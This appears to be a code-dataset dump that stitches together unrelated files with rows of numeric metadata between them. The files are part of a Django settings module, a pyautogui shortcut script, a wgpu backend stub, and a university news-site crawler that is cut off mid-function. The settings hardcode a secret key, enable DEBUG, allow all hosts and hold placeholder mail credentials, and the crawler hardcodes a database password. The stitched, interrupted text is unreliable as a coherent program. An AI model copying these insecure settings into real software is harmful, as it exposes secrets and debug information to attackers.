SECRET_KEY = 'z%6vtjnpsra+m1r%3s=pavbpeiz12a_&8u0qf^p(fg6c8)i%it'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
API_VERSION = 'v1'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'infs3202.users',
'infs3202.events',
'infs3202.password_reset'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'infs3202.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'infs3202.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'infs3202',
'USER': 'infs3202',
'PASSWORD': '',
'HOST': 'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME': 'infs3202.utils.validators.MinimumNumberOfSymbolsValidator',
},
{
'NAME': 'infs3202.utils.validators.UppercaseValidator',
},
{
'NAME': 'infs3202.utils.validators.NumberValidator',
}
]
AUTH_USER_MODEL = 'users.User'
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.AllowAllUsersModelBackend',
)
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(days=7),
'REFRESH_TOKEN_LIFETIME': timedelta(days=15),
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Australia/Brisbane'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/uploads/'
# CORS
CORS_ORIGIN_WHITELIST = list(
{'127.0.0.1:3000', 'localhost:3000', 'thebigevent.xyz', 'www.thebigevent.xyz', 'staging.thebigevent.xyz', 'www.staging.thebigevent.xyz'}
)
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': ['rest_framework.permissions.IsAuthenticatedOrReadOnly'],
'DEFAULT_RENDERER_CLASSES': [
'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer'
],
'DEFAULT_PARSER_CLASSES': [
'djangorestframework_camel_case.parser.CamelCaseJSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication'
],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 6
}
# Email
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'email' # Change this
EMAIL_HOST_PASSWORD = 'password' # Change this
EMAIL_USE_TLS = True
FRONTEND_URL = 'http://127.0.0.1:3000'
| 28.674157 | 140 | 0.702194 | 544 | 5,104 | 6.439338 | 0.411765 | 0.059378 | 0.038824 | 0.049957 | 0.157294 | 0.132743 | 0.07622 | 0.07622 | 0.034256 | 0 | 0 | 0.0251 | 0.164773 | 5,104 | 177 | 141 | 28.836158 | 0.796622 | 0.202978 | 0 | 0.032787 | 1 | 0 | 0.573657 | 0.46769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.065574 | 0.016393 | 0 | 0.016393 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8e948dd6b36b98377cd26d3e42151c11724995ee | 1,630 | py | Python | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
"MIT"
] | null | null | null | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
"MIT"
] | null | null | null | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
"MIT"
] | null | null | null | import pyautogui
import time
def increase_volume():
i = 0
while i < 5:
pyautogui.press("volumeup")
i = i + 1
def decrease_volume():
i = 0
while i < 5:
pyautogui.press("volumedown")
i = i + 1
def switch_window():
pyautogui.keyDown('alt')
pyautogui.press('tab')
pyautogui.keyUp('alt')
def restore_down():
pyautogui.keyDown('win')
pyautogui.press('down')
pyautogui.keyUp('win')
def minimize_window():
pyautogui.keyDown('win')
pyautogui.press('down')
pyautogui.press('down')
pyautogui.keyUp('win')
def maximize_window():
pyautogui.keyDown('win')
pyautogui.press('up')
pyautogui.keyUp('win')
def copy():
pyautogui.keyDown('ctrl')
pyautogui.press('c')
pyautogui.keyUp('ctrl')
def cut():
pyautogui.keyDown('ctrl')
pyautogui.press('x')
pyautogui.keyUp('ctrl')
def paste():
pyautogui.keyDown('ctrl')
pyautogui.press('v')
pyautogui.keyUp('ctrl')
def select_all():
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
def save():
pyautogui.keyDown('ctrl')
pyautogui.press('s')
pyautogui.keyUp('ctrl')
def save_as():
pyautogui.keyDown('ctrl')
pyautogui.keyDown('shift')
pyautogui.press('s')
pyautogui.keyUp('shift')
pyautogui.keyUp('ctrl')
def close_current_program():
pyautogui.keyDown('alt')
pyautogui.press('f4')
pyautogui.keyUp('alt')
def open_settings():
pyautogui.keyDown('win')
pyautogui.press('i')
pyautogui.keyUp('win')
| 20.897436 | 38 | 0.60184 | 182 | 1,630 | 5.32967 | 0.258242 | 0.216495 | 0.123711 | 0.179381 | 0.602062 | 0.242268 | 0.195876 | 0.059794 | 0 | 0 | 0 | 0.005654 | 0.240491 | 1,630 | 77 | 39 | 21.168831 | 0.777868 | 0 | 0 | 0.555556 | 0 | 0 | 0.08886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.031746 | 0 | 0.253968 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8e9c5a5f580743470028916ac01c27e2fac8992d | 262 | py | Python | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 74 | 2020-07-07T06:27:55.000Z | 2022-03-21T10:50:00.000Z | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 98 | 2020-06-16T12:20:27.000Z | 2022-03-23T17:35:44.000Z | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 11 | 2020-06-16T11:57:01.000Z | 2021-10-05T13:55:07.000Z | """
We *could* implement our own Vulkan backend, so we would not need the wgpu lib.
It would be a lot of work to build and maintain though, so unless the
Rust wgpu project is abandoned or something, this is probably a bad idea.
"""
raise NotImplementedError()
| 29.111111 | 79 | 0.755725 | 45 | 262 | 4.4 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187023 | 262 | 8 | 80 | 32.75 | 0.929577 | 0.854962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8eaece1eb32abdc455db7d5a4c88320431dcd8e6 | 47,345 | py | Python | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | null | null | null | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | 1 | 2020-11-21T08:09:17.000Z | 2020-12-03T13:14:52.000Z | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | null | null | null | """
Crawl the original page's HTML, filter the news content and re-assemble it, preserving the original page styling.
"""
import pymysql
import datetime
import requests
from lxml import etree
import pdfkit
import os
import time
import json
import re
# Sensitive-word filter class (Aho-Corasick automaton)
import Ac_auto
# Task id
task_id = 2
# URL and name of the site being crawled
spider_url = 'https://news.cqu.edu.cn/newsv2/'
spider_name = '重大新闻网'
# Months/days on which the spider crawls the homepage and section front pages
spider_month = [1, 7]
spider_day = [1]
# Sleep interval between requests
sleep_time = 0.1
# MySQL connection settings
conn = pymysql.connect(
host='localhost',
port=3307,
user='root',
passwd='123456',
db='spider_test',
use_unicode=True,
charset="utf8mb4"
)
# MySQL insert statements
# Insert into the spider result table
insert_result = '''
INSERT INTO t_spider_result VALUES (NULL, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, NULL)
'''
# Global dict storing crawled records as key-value pairs (key: URL, value: title).
dict_data = dict()
# pdfkit configuration and options
confg = pdfkit.configuration(wkhtmltopdf=r'/usr/local/bin/wkhtmltopdf')
options = {
'page-size': 'A4',
'viewport-size': 1920*1080
}
# Spoofed HTTP request headers
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;'
}
# Fetch the xpath from the database config table and extract the matching content
def get_xpath_content(html, xpath_name):
    # Helper that filters out whitespace-only strings
def not_empty(s):
return s and s.strip()
cur.execute("SELECT xpath FROM t_spider_config_xpath WHERE name = %s", xpath_name)
xpath = cur.fetchone()
xpath = xpath[0]
content = html.xpath(xpath)
    # Post-process content: join results with fewer than 2 elements into a string and strip surrounding whitespace; otherwise drop whitespace-only entries
if len(content) < 2:
content = ''.join(content)
content = content.strip()
else:
content = list(filter(not_empty, content))
return content
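The `not_empty` helper drives `filter()` to drop whitespace-only strings from multi-element xpath results. A self-contained illustration of that filtering step (the sample list is made up):

```python
def not_empty(s):
    # Truthy only for strings with non-whitespace content
    return s and s.strip()


items = ["  ", "News", "", "\n", "Sports"]
assert list(filter(not_empty, items)) == ["News", "Sports"]
```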
# Get the config-table id to be stored with the result row
def get_conf_id(module_name=None):
    conf_id = None  # avoid returning an unbound name when module_name is falsy
    if module_name:
cur.execute("SELECT id FROM t_spider_conf WHERE moduleName like %s ", '%' + module_name + '%')
conf_id = cur.fetchone()
conf_id = conf_id[0]
return conf_id
# Find and save the URLs of all sections (board URLs)
def all_urls_list(f_data):
global dict_data
    # Load the persisted dict data
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
heading = '新闻网'
    # Crawl the homepage and front pages on schedule: once on Jan 1 and once on Jul 1; skip on other dates
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
print('正在爬取 {} 主页。'.format(spider_name))
        # Store the index record in the dict and database; skip if it already exists
judge = spider_url in dict_data.keys()
if not judge:
dict_data[spider_url] = heading
            # Create the output folder
            # Check whether the folder exists first; create it if it does not
now_dir = os.getcwd()
new_dir = now_dir + '/' + heading + '首页'
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(spider_url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
            # Get the config-table id to be stored with the result row
conf_id = get_conf_id('所有栏目')
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'index', spider_url, html_filter, html_file, pdf_file, time_now, heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
                # Convert the HTML page to PDF
pdfkit.from_url(spider_url, pdf_file, configuration=confg, options=options)
print('《{}》 的首页已储存,转换pdf格式已成功。'.format(heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 首页记录已爬取过且保存在数据库中!'.format(heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 主页不做爬取!'.format(spider_name))
r = requests.get(spider_url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading_url_list = []
try:
news_heading_url_list = get_xpath_content(html, '所有栏目URL的xpath')
        # Drop the homepage URL
news_heading_url_list.remove(news_heading_url_list[0])
        # Add the Bulletin (快讯) and Special Topic (专题) boards
news_heading_url_list.append('https://news.cqu.edu.cn/newsv2/list-15.html')
news_heading_url_list.append('http://news.cqu.edu.cn/kjcd/')
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# print(news_heading_url_list)
return news_heading_url_list
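The dedupe-and-persist pattern used throughout (check `dict_data` for the URL, add it, then rewrite the JSON file from offset 0) can be sketched as below; `io.StringIO` stands in for the spider's `f_data` handle. One assumption-flagged difference: the sketch calls `truncate()` after writing, because seeking to 0 and overwriting without truncating can leave stale bytes when the new JSON is shorter than the old one.

```python
import io
import json

seen = {}
buf = io.StringIO()  # stand-in for the spider's f_data file handle


def record(url, title):
    # Store each URL at most once, then persist the whole dict as JSON
    if url not in seen:
        seen[url] = title
        buf.seek(0)
        buf.write(json.dumps(seen))
        buf.truncate()  # drop stale bytes if the new JSON is shorter


record("https://example.org/a", "A")
record("https://example.org/a", "duplicate, ignored")
buf.seek(0)
assert json.loads(buf.read()) == {"https://example.org/a": "A"}
```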
# Find and save the URL of every page (list URLs) under each section/board
# Applies to category 1 (news modules), 2 (media coverage), 3 (notices and bulletins), 4 (academic previews), and 5 (Bulletin 快讯)
def get_url_list(url, all_urls, f_data):
global dict_data
    # Load the persisted dict data
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
url_list = []
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading = ''
    # Get the board's index in news_heading_url_list, plus the board name and its total news count
    # Special-case the Bulletin (快讯) board:
if url == 'https://news.cqu.edu.cn/newsv2/list-15.html':
try:
news_heading = get_xpath_content(html, '快讯类栏目标题xpath')
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
temp_url = url
else:
cur.execute("SELECT xpath from t_spider_config_xpath where name = %s", '新闻类栏目标题xpath')
xpath = cur.fetchone()
xpath = xpath[0]
        # Pick a different xpath depending on the section
index = all_urls.index(url)
xpath = xpath.replace('?', str(index + 2))
try:
news_heading = html.xpath(xpath)
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
temp_url = url + '?page=1'
    # Find the maximum page number
page = html.xpath('/html/body/div[@class="row"]/div/div[@class="lists"]/div[@class="page"]/a[12]/text()')
page = ''.join(page)
# print(page)
max_page = int(page)
    # Crawl front pages on schedule: once on Jan 1 and once on Jul 1; skip on other dates
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
list_heading = '各级首页'
print('正在爬取 {} 栏目首页。'.format(news_heading))
        # Store the record for page 1 of the list in the dict and database; skip if it already exists
judge = temp_url in dict_data.keys()
if not judge:
dict_data[temp_url] = list_heading
            # Create the output folder
            # Check whether the folder exists first; create it if it does not
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(temp_url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
            # Get the config-table id to be stored with the result row
conf_id = get_conf_id(news_heading)
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'list', temp_url, html_filter, html_file, pdf_file, time_now, list_heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
                # Convert the HTML page to PDF
pdfkit.from_url(temp_url, pdf_file, configuration=confg, options=options)
print('栏目 《{}》 的首页已储存,转换pdf格式已成功。'.format(news_heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 栏目 首页记录已爬取过且保存在数据库中!'.format(news_heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 栏目首页不做爬取!'.format(news_heading))
    # Special-case the Bulletin (快讯) board:
if url == 'https://news.cqu.edu.cn/newsv2/list-15.html':
for i in range(1, max_page + 1):
temp_url = url[:-5] + '-' + str(i) + '.html'
url_list.append(temp_url)
else:
for i in range(1, max_page + 1):
            # print('Crawling page {} of online news......'.format(i))
temp_url = url + '?page=' + str(i)
url_list.append(temp_url)
# print(url_list)
return url_list
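`get_url_list` builds per-page URLs two ways: the Bulletin board rewrites the `.html` suffix, everything else appends a `?page=N` query. A sketch of both patterns (`some-section` is a made-up path for illustration):

```python
# Bulletin board: strip ".html" (5 chars) and append "-<page>.html"
bulletin = "https://news.cqu.edu.cn/newsv2/list-15.html"
bulletin_pages = [bulletin[:-5] + "-" + str(i) + ".html" for i in range(1, 4)]
assert bulletin_pages[0] == "https://news.cqu.edu.cn/newsv2/list-15-1.html"

# Other sections: append a page query parameter
section = "https://news.cqu.edu.cn/newsv2/some-section"
section_pages = [section + "?page=" + str(i) for i in range(1, 4)]
assert section_pages[2] == "https://news.cqu.edu.cn/newsv2/some-section?page=3"
```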
# Find and save the URL of every page (list URLs) under the Special Topic (专题) section; returns a dict.
def get_topic_url_list(url, f_data):
global dict_data
    # Load the persisted dict data
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
url_dict = dict()
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading = '专题'
    # Crawl front pages on schedule: once on Jan 1 and once on Jul 1; skip on other dates
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
list_heading = '各级首页'
print('正在爬取 {} 栏目首页。'.format(news_heading))
        # Store the Special Topic list record in the dict and database; skip if it already exists
judge = url in dict_data.keys()
if not judge:
dict_data[url] = list_heading
            # Create the output folder
            # Check whether the folder exists first; create it if it does not
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
            # Get the config-table id to be stored with the result row
conf_id = get_conf_id(news_heading)
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'list', url, html_filter, html_file, pdf_file, time_now, list_heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
                # Convert the HTML page to PDF
pdfkit.from_url(url, pdf_file, configuration=confg, options=options)
print('栏目 《{}》 的主页已储存,转换pdf格式已成功。'.format(news_heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 栏目 主页记录已爬取过且保存在数据库中!'.format(news_heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 栏目首页不做爬取!'.format(news_heading))
try:
topic_urls_list = get_xpath_content(html, '专题网址xpath')
topic_names_list = get_xpath_content(html, '专题标题xpath')
# print(topic_urls_list)
# print(topic_names_list)
        # Append the four homepage special-topic URLs to topic_urls_list and their titles to topic_names_list
topic_name = ['毕业季|青春不落幕 友谊不散场', '辉煌70年•追梦重大人', '不忘初心 牢记使命', '一带一路年会']
for i in range(4, 8):
topic_urls_list.append('http://news.cqu.edu.cn/newsv2/index.php?m=special&c=index&specialid=8' + str(i))
topic_names_list.append(topic_name[(i - 4)])
        # Prefix each topic title with '专题_' to tell them apart
temp_list = []
for each in topic_names_list:
temp_list.append('专题_' + each)
topic_names_list = temp_list
url_dict = dict(zip(topic_names_list, topic_urls_list))
        # dict key: topic title; value: topic URL
# print(url_dict)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
return url_dict
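`get_topic_url_list` pairs topic titles with topic URLs via `dict(zip(...))`. A small illustration with two made-up entries in the same shape:

```python
topic_names = ["专题_毕业季", "专题_一带一路年会"]  # titles already carry the '专题_' prefix
topic_urls = [
    "http://news.cqu.edu.cn/newsv2/index.php?m=special&c=index&specialid=84",
    "http://news.cqu.edu.cn/newsv2/index.php?m=special&c=index&specialid=87",
]
# zip pairs each title with its URL; dict() turns the pairs into a lookup table
url_dict = dict(zip(topic_names, topic_urls))
assert url_dict["专题_毕业季"].endswith("specialid=84")
```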
# Read each page URL of the news module, collect archive metadata for every news item, and save each page as PDF
def get_news_info(url_list, module_url, all_urls, f_data):
global dict_data
    # Load the persisted dict data
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
    # Get the config-table id to be stored with the result row
conf_id = get_conf_id('新闻模块')
    # Running total of news items in the news module
sum_i = 0
    # Page counter for the news module
page = 1
    # Get the section name
news_heading = ''
    dict_news = {'网站名称': spider_name, '网站域名': spider_url}
r = requests.get(module_url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
cur.execute("SELECT xpath from t_spider_config_xpath where name = %s", '新闻类栏目标题xpath')
xpath = cur.fetchone()
xpath = xpath[0]
# Pick a different xpath for each column
index = all_urls.index(module_url)
xpath = xpath.replace('?', str(index + 2))
try:
news_heading = html.xpath(xpath)
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# Iterate over each listing-page URL
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '新闻模块网址xpath')
title_list = get_xpath_content(html, '新闻模块标题xpath')
# Pair each news URL with its title
for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条新闻。'.format(news_heading, page, sum_i + 1))
# Record this news URL in the dict and the database; skip it if already recorded
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
dict_news['所属栏目'] = news_heading
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", '新闻模块' + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
dict_news[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_news['标题'] = title
dict_news['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_news['采集时间'] = time_now
dict_news['采集人'] = '档案馆'
if dict_news['发布时间']:
release_time = dict_news['发布时间']
else:
release_time = None
json_dict = json.dumps(dict_news, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# Check whether the page is a 404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, release_time, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该新闻《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# Record the 404 page in the database
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该新闻《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条新闻 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条新闻'.format(news_heading, page - 1, sum_i))
# Read the URL of every 媒体重大 page, collect each item's archival metadata, and save each page as PDF
def get_media_info(url_list, f_data):
global dict_data
# Load previously crawled records from the dict file
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# Running count of 媒体重大 news items
sum_i = 0
# Page counter for 媒体重大
page = 1
# Counter used when pairing month/day fragments of the publish time
i = 0
news_heading = '媒体重大'
# Fetch the config-table id to store with each result row
conf_id = get_conf_id(news_heading)
dict_media = dict()
dict_media = {'网站名称': spider_name, '网站域名': spider_url}
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# Iterate over each listing-page URL
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '媒体重大网址xpath')
title_list = get_xpath_content(html, '媒体重大标题xpath')
release_time_list = get_xpath_content(html, '媒体重大发布时间xpath')
# Normalise the publish-time fragments
temp_list = []
for each in release_time_list:
each = each.strip()
# print(each)
temp_list.append(each)
release_time_list = []
while i < len(temp_list) - 1:
release_time = temp_list[i] + '月' + temp_list[i + 1] + '日'
release_time_list.append(release_time)
i += 2
# Reset the pairing counter
i = 0
# Pair each news URL with its publish time and title
for each_url, release_time, title in zip(links_list, release_time_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条新闻。'.format(news_heading, page, sum_i + 1))
# Record this 媒体重大 URL in the dict and the database; skip it if already recorded
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
resource = ''
dict_media['所属栏目'] = news_heading
# Fetch the xpaths from the database and extract content with them
try:
